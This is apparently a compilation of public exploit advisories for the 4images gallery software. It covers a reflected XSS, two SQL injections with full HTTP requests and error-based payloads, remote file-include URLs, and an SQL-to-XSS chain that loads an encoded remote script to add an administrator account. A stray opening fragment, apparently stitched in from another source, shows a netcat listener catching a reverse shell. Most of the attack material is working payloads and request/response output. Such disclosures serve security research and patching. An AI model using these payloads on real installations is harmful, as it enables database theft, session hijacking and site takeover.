// HTTP redirect response to specific template
GET /4images/categories.php?cat_id=3D1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20=
22-11-07) x86_64 GNU/Linux
13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-sessi=
on
kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su
uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$=20
--sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--
# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.4homepages.de/
# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6
# Version: 4Images Gallery 1.8
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-27308
-Description:
A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter.
-Steps to reproduce:
1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php)
2- Enter the credentials , Turn on the intercept and click on "Login"
3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE
4-Forward the request and you can see XSS is triggered.
# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.8
# Tested on: Linux
Source Analysis:
Line #658
- User action defined
if ($action == "findimages") {
Line #661
- Vulnerable condition
$condition = "1=1";
Line #654
- Default limit 50
show_input_row($lang['results_per_page'], "limitnumber", 50);
Line #736
- Define limit start
$limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : "";
if ($limitstart == "") {
$limitstart = 0;
Line #743
- Define limit number
$limitnumber = trim($HTTP_POST_VARS['limitnumber']);
if ($limitnumber == "") {
$limitnumber = 5000;
}
Line #763
- Define user input variables
$limitfinish = $limitstart + $limitnumber;
Line #786
- SQL statement
$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")."
FROM ".IMAGES_TABLE." i
LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id)
WHERE $condition
ORDER BY $orderby $direction
// Vulnerable user input of limitnumber
LIMIT $limitstart, $limitnumber";
Line #852
- Display user input defined previously
show_hidden_input("limitnumber", $limitnumber);
Exploit POC:
1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
HTTP Request:
POST /4images/admin/images.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 406
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages
Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
__csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
HTTP Response:
HTTP/1.1 200 OK
...
<b>XPATH syntax error: ':10.1.37-MariaDB'</b>
source: https://www.securityfocus.com/bid/47394/info
4images is prone to multiple remote file-include vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer in the context of the webserver process or compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
4images 1.7.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/download.php?file_path=[Ev!l-Sh3ll]
http://www.example.com/[path]/categories.php?upload_url=[Ev!l-Sh3ll]
http://www.example.com/[path]/global.php?config=[Ev!l-Sh3ll
http://www.example.com/[path]/details.php?cat_id_sql=0+AND+2=1
# vulnerable app : 4images <= 1.7.13
# Vendor : www.4homepages.de
# Author : Ahmed sultan (0x4148)
# Email : 0x4148@gmail.com
# Home : 0x4148.com
4images is a powerful web-based image gallery management system. Features
include comment system,
user registration and management, password protected administration area
with browser-based upload and HTML templates for page layout and design.
The app is vulnerable to Sql injection flaw which can be escalated to new
administrator add exploit
Vulnerable code
File : admin/validateimages.php
Line 406
$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name,
i.image_date, i.image_media_file".get_user_table_field(", u.",
"user_name")."
FROM ".IMAGES_TEMP_TABLE." i
LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.",
"user_id")." = i.user_id)
WHERE $condition
ORDER BY $orderby $direction
LIMIT $limitstart, $limitnumber";
$result = $site_db->query($sql);
Input parameter orderby is not sanitized before being passed to the sql
query which lead to sql injection flaw
POC
GET
/lab/4images1.7.13/4images/admin/validateimages.php?action=validateimages&orderby=extractvalue(1,concat(0x7e,version()))&direction=ASC&limitnumber=10
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 4images_lastvisit=1478064418; 4images_userid=1;
sessionid=ru4g0mqdpd3cj6pub1d0a5kmf4
Will result in
<br /><font color='#FF0000'><b>DB Error</b></font>: <b>Bad SQL Query</b>:
SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_date,
i.image_media_file, u.user_name
FROM 4images_images_temp i
LEFT JOIN 4images_users u ON (u.user_id = i.user_id)
WHERE 1=1
ORDER BY extractvalue(1,concat(0x7e,version())) ASC
LIMIT 0, 10<br /><b>XPATH syntax error: '~5.5.25a'
To reproduce, add normal user account, add a category and allow users to upload images in it.
Login with the normal user account and upload an image.
Try the poc
Exploitation :
By the help of JS the sql injection flaw can be used to obtain the current
csrf token and use it to add new administrator within the admin browser
session
Full exploit poc
admin/validateimages.php?action=validateimages&orderby=extractvalue(1,concat(0x3c7376672f6f6e6c6f61643d6576616c28222f2a222b55524c293e))&direction=ASC&limitnumber=10#*/with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9sb2NhbGhvc3QveC5qcw==/.source)
Ly9sb2NhbGhvc3QveC5qcw== is the base64 encoded Javascript url which will be
executed inside administrator's browser
Impact
Attacker can inject JS code which result in bypassing the CSRF token ,
adding new administrator's account
or even updating allowed extensions and uploading php shell on the
vulnerable host
Reference(s):
https://0x4148.com/2016/11/02/4images-1-7-13-sql-injection-administrator-add-exploit/
Disclosure timeline
1/11 - Vulnerability was reported
2/11 - Vendor sent fixation to review
3/11 - Fixed evrsion was retested by me and approved
3/11 - Vendor scheduled official update release
10/11 - Public disclosure